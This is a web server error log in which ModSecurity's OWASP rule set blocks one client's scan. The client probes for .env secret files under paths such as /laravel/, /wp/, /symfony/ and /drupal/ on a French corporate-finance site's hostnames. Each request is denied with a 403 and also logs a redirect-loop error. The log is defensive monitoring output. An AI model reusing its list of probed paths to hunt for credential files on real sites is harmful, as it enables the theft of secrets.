[Mon May 11 16:25:53.967459 2026] [security2:error] [pid 1412074:tid 1412092] [client 18.180.54.2:53834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/staging/.env"] [unique_id "agHm8TJnyuKVXoStDha0cgAAAFA"]
[Mon May 11 16:25:53.968572 2026] [core:error] [pid 1412074:tid 1412092] [client 18.180.54.2:53834] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:53.969080 2026] [security2:error] [pid 1412074:tid 1412092] [client 18.180.54.2:53834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/staging/.env"] [unique_id "agHm8TJnyuKVXoStDha0cgAAAFA"]
[Mon May 11 16:25:54.145815 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:53848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/laravel/.env"] [unique_id "agHm8lV4kyjgo4bQBUhUEwAAAMI"]
[Mon May 11 16:25:54.146044 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:53848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/laravel/.env"] [unique_id "agHm8lV4kyjgo4bQBUhUEwAAAMI"]
[Mon May 11 16:25:54.146572 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:53848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:54.146732 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:53848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/laravel/.env"] [unique_id "agHm8lV4kyjgo4bQBUhUEwAAAMI"]
[Mon May 11 16:25:54.731887 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:53858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/opt/.env"] [unique_id "agHm8g-Qm4vhlWBPlMi53QAAAAk"]
[Mon May 11 16:25:54.732124 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:53858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/opt/.env"] [unique_id "agHm8g-Qm4vhlWBPlMi53QAAAAk"]
[Mon May 11 16:25:54.732660 2026] [core:error] [pid 1411099:tid 1411109] [client 18.180.54.2:53858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:54.732818 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:53858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/opt/.env"] [unique_id "agHm8g-Qm4vhlWBPlMi53QAAAAk"]
[Mon May 11 16:25:54.865238 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:53870] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/symfony/.env"] [unique_id "agHm8vy_GXSWIKeli0vyHwAAAIE"]
[Mon May 11 16:25:54.865464 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:53870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/symfony/.env"] [unique_id "agHm8vy_GXSWIKeli0vyHwAAAIE"]
[Mon May 11 16:25:54.865965 2026] [core:error] [pid 1411201:tid 1411247] [client 18.180.54.2:53870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:54.866112 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:53870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/symfony/.env"] [unique_id "agHm8vy_GXSWIKeli0vyHwAAAIE"]
[Mon May 11 16:25:55.429017 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:53878] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/laravel/.env"] [unique_id "agHm8_y_GXSWIKeli0vyIAAAAJY"]
[Mon May 11 16:25:55.429269 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:53878] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/laravel/.env"] [unique_id "agHm8_y_GXSWIKeli0vyIAAAAJY"]
[Mon May 11 16:25:55.429745 2026] [core:error] [pid 1411201:tid 1411267] [client 18.180.54.2:53878] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:55.437043 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:53878] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/laravel/.env"] [unique_id "agHm8_y_GXSWIKeli0vyIAAAAJY"]
[Mon May 11 16:25:55.658264 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:53882] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/wordpress/.env"] [unique_id "agHm8zJnyuKVXoStDha0dgAAAEc"]
[Mon May 11 16:25:55.658494 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:53882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/wordpress/.env"] [unique_id "agHm8zJnyuKVXoStDha0dgAAAEc"]
[Mon May 11 16:25:55.658973 2026] [core:error] [pid 1412074:tid 1412083] [client 18.180.54.2:53882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:55.659137 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:53882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/wordpress/.env"] [unique_id "agHm8zJnyuKVXoStDha0dgAAAEc"]
[Mon May 11 16:25:56.199619 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:53888] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/symfony/.env"] [unique_id "agHm9FV4kyjgo4bQBUhUFwAAAMg"]
[Mon May 11 16:25:56.199841 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:53888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/symfony/.env"] [unique_id "agHm9FV4kyjgo4bQBUhUFwAAAMg"]
[Mon May 11 16:25:56.200335 2026] [core:error] [pid 1416109:tid 1416138] [client 18.180.54.2:53888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:56.200502 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:53888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/symfony/.env"] [unique_id "agHm9FV4kyjgo4bQBUhUFwAAAMg"]
[Mon May 11 16:25:56.434967 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:53904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/wp/.env"] [unique_id "agHm9DJnyuKVXoStDha0dwAAAFg"]
[Mon May 11 16:25:56.435233 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:53904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/wp/.env"] [unique_id "agHm9DJnyuKVXoStDha0dwAAAFg"]
[Mon May 11 16:25:56.435710 2026] [core:error] [pid 1412074:tid 1412100] [client 18.180.54.2:53904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:56.435873 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:53904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/wp/.env"] [unique_id "agHm9DJnyuKVXoStDha0dwAAAFg"]
[Mon May 11 16:25:56.898104 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:53914] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wordpress/.env"] [unique_id "agHm9Py_GXSWIKeli0vyIgAAAIQ"]
[Mon May 11 16:25:56.898344 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:53914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wordpress/.env"] [unique_id "agHm9Py_GXSWIKeli0vyIgAAAIQ"]
[Mon May 11 16:25:56.898819 2026] [core:error] [pid 1411201:tid 1411250] [client 18.180.54.2:53914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:56.898968 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:53914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wordpress/.env"] [unique_id "agHm9Py_GXSWIKeli0vyIgAAAIQ"]
[Mon May 11 16:25:57.180408 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53926] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/cms/.env"] [unique_id "agHm9Q-Qm4vhlWBPlMi54QAAAAc"]
[Mon May 11 16:25:57.180609 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53926] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/cms/.env"] [unique_id "agHm9Q-Qm4vhlWBPlMi54QAAAAc"]
[Mon May 11 16:25:57.181092 2026] [core:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:57.181269 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53926] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/cms/.env"] [unique_id "agHm9Q-Qm4vhlWBPlMi54QAAAAc"]
[Mon May 11 16:25:57.610022 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:53932] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wp/.env"] [unique_id "agHm9TJnyuKVXoStDha0egAAAEI"]
[Mon May 11 16:25:57.610265 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:53932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wp/.env"] [unique_id "agHm9TJnyuKVXoStDha0egAAAEI"]
[Mon May 11 16:25:57.611509 2026] [core:error] [pid 1412074:tid 1412078] [client 18.180.54.2:53932] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:57.611670 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:53932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/wp/.env"] [unique_id "agHm9TJnyuKVXoStDha0egAAAEI"]
[Mon May 11 16:25:57.928327 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:53944] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/drupal/.env"] [unique_id "agHm9UWKUxpmnkK7zHx7yQAAAQE"]
[Mon May 11 16:25:57.928577 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:53944] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/drupal/.env"] [unique_id "agHm9UWKUxpmnkK7zHx7yQAAAQE"]
[Mon May 11 16:25:57.929093 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:53944] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:57.929276 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:53944] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/drupal/.env"] [unique_id "agHm9UWKUxpmnkK7zHx7yQAAAQE"]
